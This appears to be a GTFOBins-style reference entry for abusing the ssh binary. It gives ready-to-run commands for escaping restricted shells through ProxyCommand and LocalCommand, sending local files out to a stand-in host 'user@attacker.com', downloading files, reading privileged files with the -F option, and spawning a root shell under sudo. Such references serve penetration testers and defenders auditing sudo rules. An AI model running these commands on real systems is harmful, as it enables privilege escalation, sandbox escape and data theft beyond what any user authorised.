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Shell File upload File download File read Sudo
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Shell

It can be used to break out from restricted environments by spawning an interactive system shell.

(a) Reconnecting may help bypassing restricted shells.

```
ssh localhost $SHELL --noprofile --norc
```

(b) Spawn interactive shell through ProxyCommand option.

```
ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```

Spawn interactive shell on client, requires a successful connection towards host.

```
ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
```

File upload

It can exfiltrate files on the network.

Send local file to a SSH server.

```
HOST=user@attacker.com

RPATH=file_to_save

LPATH=file_to_send

ssh $HOST "cat > $RPATH" < $LPATH
```

File download

It can download remote files.

Fetch a remote file from a SSH server.

```
HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
```

File read

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

The read file content is corrupted by error prints.

```
LFILE=file_to_read
ssh -F $LFILE localhost
```

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

Spawn interactive root shell through ProxyCommand option.

```
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```